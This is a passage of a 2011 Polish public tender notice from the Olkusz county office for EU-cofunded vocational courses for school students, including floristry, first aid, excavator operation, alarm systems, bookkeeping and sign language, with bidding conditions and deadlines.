-Wykonawca niezwłocznie, tj. w ciągu 3 dni, zawiadomi (w formie pisemnej) Zamawiającego o wszelkich zmianach dotyczących prowadzonego kursu. 
-Wszystkie dokumenty dotyczące realizacji kursu będą zawierały informację o współfinansowaniu projektu przez Unię Europejską w ramach Europejskiego Funduszu Społecznego oraz aktualne logotypy, zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki. 
-W pomieszczeniach, w których będą realizowane kursy będą umieszczone informacje o współfinansowaniu projektu przez Unię Europejską w ramach Europejskiego Funduszu Społecznego oraz aktualne logotypy, zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.
-Wykonawca zobowiązuje się do przedstawienia programu kursu oraz harmonogramu do akceptacji Zamawiającego, co najmniej 7 dni roboczych przed rozpoczęciem kursu.
-Sugeruje się, aby kursy/szkolenia/seminaria odbywały się w dni wolne od nauki bądź w dni powszednie po godzinie 16.00 pod warunkiem uzyskania zgody kursantów oraz koordynatora projektu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 12.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku dokonana zostanie zgodnie z formułą (spełnia-nie spełnia) w oparciu o informacje zawarte w oświadczeniu o spełnianiu warunków udziału w postępowaniu złożonym według załącznika nr 2a do SIWZ (dla wszystkich części zamówienia) oraz w oparciu o informacje zawarte w dokumencie potwierdzającym posiadanie uprawnień do prowadzenia kursu /Operator koparko-ładowarki kl. III/ zgodnie z Rozporządzeniem Ministra Gospodarki z 20 września 2001r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U. Nr 118, poz. 1263) wydanym przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku dokonana zostanie zgodnie z formułą (spełnia-nie spełnia) w oparciu o informacje zawarte w oświadczeniu o spełnianiu warunków udziału w postępowaniu złożonym według załącznika nr 2a do SIWZ oraz wykazie wykonanych usług złożonym wg załącznika nr 4. Z treści wykazu musi wynikać, że Wykonawca spełnia warunek doświadczenia dotyczący: wykonania w ciągu ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 (dwóch) usług szkoleniowych  o tematyce tożsamej z przedmiotem określonej części zamówienia, na którą wykonawca składa ofertę.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku dokonana zostanie zgodnie z formułą (spełnia-nie spełnia) w oparciu o informacje zawarte w oświadczeniu o spełnianiu warunków udziału w postępowaniu złożonym według załącznika nr 2a do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku dokonana zostanie zgodnie z formułą (spełnia-nie spełnia) w oparciu o informacje zawarte w oświadczeniu o spełnianiu warunków udziału w postępowaniu złożonym według załącznika nr 2a do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku dokonana zostanie zgodnie z formułą (spełnia-nie spełnia) w oparciu o informacje zawarte w oświadczeniu o spełnianiu warunków udziału w postępowaniu złożonym według załącznika nr 2a do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku składania oferty na część IV zamówienia należy złożyć wraz z ofertą odpowiedni dokument potwierdzający posiadanie uprawnień do prowadzenia kursu /Operator koparko-ładowarki kl. III/ zgodnie z Rozporządzeniem Ministra Gospodarki z 20 września 2001r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U. Nr 118, poz. 1263) wydany przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Umowa może być zmieniona w stosunku do treści oferty, na podstawie, której dokonano wyboru wykonawcy w poniższym zakresie:
a) łączne wynagrodzenie Wykonawcy za przeprowadzenie kursu może ulec zmniejszeniu: 
- w przypadku zmniejszenia ilości uczestników określonego kursu Wykonawca otrzyma wynagrodzenie zmniejszone proporcjonalnie do zmniejszonej ilości uczestników kursu, przy czym wskazana w ofercie cena brutto kursu dla 1 uczestnika jest stała i nie ulega zmianie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sp.olkusz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Olkuszu, ul. Mickiewicza 2, 32-300 Olkusz- pokój nr 92.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.11.2011 godzina 11:00, miejsce: Starostwo Powiatowe w Olkuszu, ul. Mickiewicza 2, 32-300 Olkusz- pokój nr 41.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn. Modernizacja Kształcenia Zawodowego w Małopolsce współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kurs florystyczny dostosowany do potrzeb młodzieży uczęszczającej do szkoły specjalnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem części I zamówienia jest organizacja  i przeprowadzenie  Kursu florystycznego dostosowanego do potrzeb młodzieży uczęszczającej do szkoły specjalnej.
Liczba uczestników - 10.
Kurs w wymiarze co najmniej 30 godzin.
Program kursu powinien obejmować co najmniej zagadnienia:
1.	Narzędzia, materiały i techniki florystyczne
2.	Zasady postępowania z materiałem roślinnym
3.	Dekoracje wielkanocne
4.	Dekoracje wnętrz
5.	Kompozycje żałobne
6.	Florystyka ślubna
Metody pracy:
-zajęcia teoretyczne ograniczone do minimum
-ćwiczenia praktyczne

Miejsce realizacji: Zespół Szkół nr 5 w Olkuszu, ul. Kochanowskiego 2
Termin realizacji: od dnia podpisania umowy do 29.02.2012r.
Kurs zakończony egzaminem wewnętrznym. Po zaliczeniu egzaminu uczeń powinien otrzymać dyplom ukończenia kursu oraz zaświadczenie o ukończeniu kursu zgodne z Rozporządzenie z dnia 03 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności  i kwalifikacji zawodowych w formach pozaszkolnych - Dz. U. z 2006r. Nr 31, poz.216 z późniejszymi zmianami.
Ilekroć w opisie czasu zajęć występuje słowo godzina, należy przez to rozumieć 50 minut zajęć  + 10 minut przerwy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.02.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Degustacja win.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem części II zamówienia jest organizacja i przeprowadzenie kursu -  Degustacja win. Liczba uczestników: 3 osoby.
W związku z niewielką liczbą uczestników kursu, Zamawiający dopuszcza włączenie kursantów do grupy z poza niniejszego Zamówienia.

Seminarium w wymiarze co najmniej 15 godzin
Program kursu powinien obejmować co najmniej:
I - teoria 
1.	Słownictwo i pojęcia związane z winem
2.	Historia wina
3.	Regiony winiarskie i odmiany winorośli
4.	Klasyfikacja i typologia win
5.	Proces produkcji win
6.	Wprowadzenie do degustacji
7.	Zasady podawanie i doboru win do potraw
8.	Kupowanie, przechowywanie i podawanie win
9.	Praktyczne porady
II - panel degustacyjny
1.	Degustacja co najmniej 15 gatunków win

Wykonawca jest zobowiązany do zapewnienia każdemu uczestnikowi kursu książkę:
/Wino - kurs wiedzy/
Kevin Zraly
Wydawnictwo: Explanator , Listopad 2010 
która po zakończeniu kursu zostaną własnością kursanta.

Metody pracy:
-zajęcia teoretyczne
-zajęcia praktyczne

Termin realizacji: od dnia podpisania umowy do 09.12.2011r.
Ilekroć w opisie czasu zajęć występuje słowo godzina, należy przez to rozumieć 50 minut zajęć  + 10 minut przerwy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 09.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pierwsza pomoc.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem części III zamówienia jest organizacja i  przeprowadzenie kursu - Pierwsza pomoc. Liczba uczestników: 10
1.Seminarium w wymiarze co najmniej 10 godzin.
Program kursu powinien obejmować co najmniej:
2.	Prawne aspekty udzielania pierwszej pomocy,
3.	Standardy w ratownictwie medycznym i przedmedycznym,
-Wg Europejskiej Rady Resuscytacji,
-Wg Amerykańskiego Towarzystwa Kardiologii,
4.	Bezpieczeństwo ratownika,
5.	Bezpieczeństwo otoczenia,
6.	Środki ochrony własnej ratownika,
7.	Prawidłowe wezwanie pomocy,
8.	Reakcja organizmu na niedotlenienie,
9.	 /Łańcuch przeżycia/,
10.	Reguła ABC,
11.	Ocena stanu świadomości,
12.	Udrożnianie dróg oddechowych,
13.	Ocena oddychania, metoda WIDZĘ, SŁYSZĘ, CZUJĘ (pokaz na fantomie),
14.	Ocena stanu układu krążenia,
15.	Nieprzytomny - POZYCJA BOCZNA USTALONA (pokaz),
16.	Zatrzymanie oddechu (sztuczne oddychanie metodą usta-usta),
17.	Zatrzymanie krążenia i oddechu - dorośli,
18.	Prowadzenie resuscytacji krążeniowo-oddechowej przez jednego ratownika - ćwiczenia na fantomie,
19.	Prowadzenie resuscytacji krążeniowo-oddechowej przez dwóch ratowników - ćwiczenia na fantomie,
20.	Postępowanie w przypadku zachłyśnięcia ciałem obcym,
21.	Zasady bezpieczeństwa użycia AED (automatycznego defibrylatora zewnętrznego),
22.	Prowadzenie resuscytacji krążeniowo-oddechowej z użyciem AED,
23.	Wstrząs - definicja, objawy, postępowanie,
24.	Udzielanie pomocy w urazach,
25.	Nagłe stany zagrożenia życia,
26.	Pomoc dzieciom i niemowlętom.
 
Metody pracy:
-zajęcia teoretyczne
-zajęcia praktyczne.
Termin realizacji: od dnia podpisania umowy do 09.12.2011r.
Kurs zakończony egzaminem wewnętrznym. Po zaliczeniu egzaminu uczeń powinien otrzymać dyplom ukończenia kursu oraz zaświadczenie o ukończeniu kursu zgodne z Rozporządzenie z dnia 03 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności  i kwalifikacji zawodowych w formach pozaszkolnych - Dz. U. z 2006r. Nr 31, poz.216 z późniejszymi zmianami.
Ilekroć w opisie czasu zajęć występuje słowo godzina, należy przez to rozumieć 50 minut zajęć  + 10 minut przerwy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 09.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Operator koparko-ładowarki klasy III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem części IV zamówienia jest organizacja i przeprowadzenie kursu - Operator koparko-ładowarki klasy III.  Liczba uczestników: 10 osób
Kurs w wymiarze co najmniej 202 godzin w tym: 116 godzin zajęć teoretycznych, 60 godzin praktycznych oraz 26 godzin stażu wstępnego
Kurs musi być przeprowadzony w oparciu o program zatwierdzony przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego oraz zgodnie z Rozporządzeniem Ministra Gospodarki z dnia 20.09.2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U. nr 118 z dnia 15.10.2001 r. poz. 1263). Kurs powinien przygotować uczestnika do podejścia do egzaminu zewnętrznego, którego pozytywny wynik skutkuje wydaniem książeczki operatora Instytutu Mechanizacji Budownictwa i Górnictwa 
Skalnego w Warszawie.
Metody pracy:
-zajęcia teoretyczne
-zajęcia praktyczne  w wymiarze co najmniej 116 godzin
Termin realizacji:  od dnia podpisania umowy do 31 maja 2012
Wykonawca powinien wliczyć w cenę kursu cenę jednokrotnego podejścia uczestnika do egzaminu zewnętrznego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Kurs przygotowujący do egzaminu kwalifikacyjnego na uprawnienia E w zakresie Eksploatacji sieci i urządzeń elektroenergetycznych do 1kV i powyżej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem części V zamówienia jest organizacja i przeprowadzenie kursu  przygotowującego do egzaminu kwalifikacyjnego na uprawnienia E w zakresie Eksploatacji sieci i urządzeń elektroenergetycznych do 1kV i powyżej.Liczba uczestników:  20 osób
Kurs w wymiarze co najmniej 45 godzin
Zakres tematyczny szkolenia obejmuje co najmniej  następujące zagadnienia: 
1.	obowiązujące przepisy w zakresie eksploatacji urządzeń i instalacji elektroenergetycznych do 1 kV, 
2.	bhp, organizację pracy, ochronę przeciwporażeniową,
3.	ratownictwo,
4.	instalacje elektroenergetyczne i zabezpieczenia do 1 kV,
5.	urządzenia oświetlenia elektrycznego wewnętrznego,
6.	elektryczne urządzenia napędowe, prostowniki i akumulatory, rozdzielnice.

Termin realizacji: od dnia podpisania umowy do 29.02.2012r.
Wykonawca powinien wliczyć w cenę kursu cenę jednokrotnego podejścia uczestnika do egzaminu zewnętrznego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.02.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Kurs prawa jazdy kat. C.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem części VI zamówienia jest organizacja i przeprowadzenie kursu prawa jazdy kat. C. Liczba uczestników: 10
Kurs w wymiarze co najmniej 50 godzin (20 teoria, 30 praktyka)
Metody pracy:
-zajęcia teoretyczne
-zajęcia praktyczne
Termin realizacji: od dnia podpisania umowy do 30 kwietnia 2012
Wykonawca powinien wliczyć w cenę kursu cenę jednokrotnego podejścia uczestnika do egzaminu zewnętrznego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Systemy alarmowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem części VII zamówienia jest organizacja i przeprowadzenie kursu - Systemy alarmowe.Liczba uczestników: 12
Kurs w zakresie co najmniej 36 godzin.
Tematyka kursu:
1.	Omówienie cech i zasad działania systemów alarmowych. 
2.	Zasady projektowania systemów alarmowych. 
3.	Zapoznanie teoretyczne z centralami z serii Integra. 
4.	Zajęcia praktyczne związane z centralami Integra. 
5.	Zapoznanie teoretyczne z urządzeniami współpracującymi z Integrą. 
6.	Zajęcia praktyczne związane z modułami współpracującymi z Integra. 
a.      Moduły przewodowe rozszerzające wejścia i wyjścia. 
b.     Moduły bezprzewodowe. 
c.      Wizualizacja stanów systemu alarmowego
7.	Ćwiczenia praktyczne z programowania central, 
8.	Zapoznanie się z możliwościami komunikacyjnymi Integry ( linia telefoniczna , gsm, sieć TCP/IP), 
9.	Zajęcia praktyczne związane z możliwościami komunikacyjnymi, 
10.	Teoretyczne i praktyczne zajęcia z zakresu powiadamiania i monitorowania, 
11.	Projektowanie systemu alarmowego, 
12.	Praktyczne wykonanie zaprojektowanego systemu, 
13.	Zagadnienia marketingowo-handlowe w zakresie obsługi klienta 

Termin realizacji: od dnia podpisania umowy do 31.01.2012r.

Kurs zakończony egzaminem wewnętrznym. Po zaliczeniu egzaminu uczeń powinien otrzymać dyplom ukończenia kursu oraz zaświadczenie o ukończeniu kursu zgodne z Rozporządzenie z dnia 03 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności  i kwalifikacji zawodowych w formach pozaszkolnych - Dz. U. z 2006r. Nr 31, poz.216 z późniejszymi zmianami..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Kurs małej księgowości i obsługi kasy fiskalnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem części VIII zamówienia jest organizacja i przeprowadzenie kursu małej księgowości i obsługi kasy fiskalnej. Liczba uczestników: 18 osób w co najmniej dwóch grupach.
Kurs w zakresie co najmniej 40 godzin
Tematyka kursu:
1.	Podstawy prawne i zasady prowadzenia rachunkowości w małych i średnich przedsiębiorstwach,
2.	Zasady sporządzania, obiegu, kontroli i przechowywania dowodów księgowych w małych i średnich 

przedsiębiorstwach,
3.	Zasady opodatkowania MiSP
4.	Uproszczone formy ewidencji księgowej,
5.	Zasady prowadzenia podatkowej księgi przychodów i rozchodów,
6.	dokumentowanie zdarzeń gospodarczych z użyciem programów komputerowych - operacje związane z obrotem pieniężnym, zakupem, sprzedażą, kosztami,
7.	Prowadzenie różnych kartotek z wykorzystaniem  programów komputerowych,
8.	Ewidencja środków trwałych u podatników prowadzących PKPiR z wykorzystaniem programów komputerowych,
9.	Dokumentacja rozrachunków z tytułu wynagrodzeń z wykorzystaniem programów komputerowych,
10.	Prowadzenie uproszczonych form ewidencji księgowej z użyciem programów komputerowych,
11.	Rozrachunki przedsiębiorstwa z ZUS za pośrednictwem programu PŁATNIK,
12.	Rozrachunki przedsiębiorstwa z Urzędem Skarbowym,
13.	Obsługa kas fiskalnych różnych typów,
14.	Obsługa terminali kart płatniczych.

Termin realizacji: od dnia podpisania umowy do 29.02.2012r.

Kurs zakończony egzaminem wewnętrznym. Po zaliczeniu egzaminu uczeń powinien otrzymać dyplom ukończenia kursu oraz zaświadczenie o ukończeniu kursu zgodne z Rozporządzenie z dnia 03 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności  i kwalifikacji zawodowych w formach pozaszkolnych - Dz. U. z 2006r. Nr 31, poz.216 z późniejszymi zmianami..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.02.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Kurs języka migowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem części IX zamówienia jest organizacja i przeprowadzenie kursu języka migowego.Liczba uczestników: 6
Kurs w zakresie co najmniej 60 godzin
Tematyka kursu:	
1.	Podstawy problematyki środowiska osób niesłyszących i ich potrzeb ze szczególnym uwzględnieniem sytuacji społecznej.
2.	Podstawy wiedzy o języku migowym i jego zastosowaniach w komunikacji z niesłyszącymi.
3.	Nabycie praktycznych umiejętności w posługiwaniu się polskim alfabetem palcowym oraz podstawowymi liczebnikami głównymi i porządkowymi.
4.	Poznanie co najmniej 400 podstawowych znaków pojęciowych języka migowego oraz technikę ich używania zgodnie z zasadami, zarówno Systemu Językowo-Migowego (SJM) jak też Polskiego Języka Migowego (PJM) w tym opanowanie słownictwa z zakresu turystyki i rekreacji.
5.	Rozumienie wypowiedzi sformułowanych w języku migowym.

Termin realizacji: od dnia podpisania umowy do 30.04.2012r.
 
Kurs języka migowego musi się zakończyć egzaminem wewnętrznym przeprowadzonym przez komisję w skład której wchodzą wykładowcy języka migowego oraz co najmniej jeden przedstawiciel Polskiego Związku Głuchych. Uczestnicy kursu otrzymują zaświadczenie wydane przez  Polski Związek Głuchych potwierdzające uczestnictwo w kursie oraz certyfikat z wpisaną oceną końcową, po zdanym egzaminie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Kurs kadry i płace + program /Symfonia/.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem części X zamówienia jest organizacja i przeprowadzenie kursu kadry i płace + program /Symfonia/. Liczba uczestników: 6
Kurs w wymiarze co najmniej 60 godzin
Tematyka kursu:
1.	Prawo pracy (rodzaje umów o pracę, wynagrodzenie, czas pracy, odpowiedzialność materialna, urlopy, przepisy bezpieczeństwa i higieny pracy, akta personalne, prowadzenie dokumentacji pracowniczej),
2.	Ubezpieczenia społeczne - rozliczenia z ZUS (podleganie ubezpieczeniom, zgłaszanie płatników i ubezpieczonych, składki: podstawa i zasady ustalania, terminy i formy płatności, dokumenty rozliczeniowe, zasiłki z ubezpieczenia społecznego, kapitał początkowy,
3.	Prawo podatkowe (podatek dochodowy od osób fizycznych-obowiązki zakładu pracy jako płatnika),
4.	Odpowiedzialność pracownika (kodeks cywilny, kodeks pracy, kodeks karny- przepisy szczegółowe),
5.	Archiwizacja dokumentów,
6.	Obsługa programów komputerowych wspomagających pracę działów kadrowo - płacowych (płatnik, programy kadrowo - płacowe: Logotech AA, Comarch, Symfonia, Rakssol, Vulkan).

Termin realizacji: od dnia podpisania umowy do 30.04.2012r.

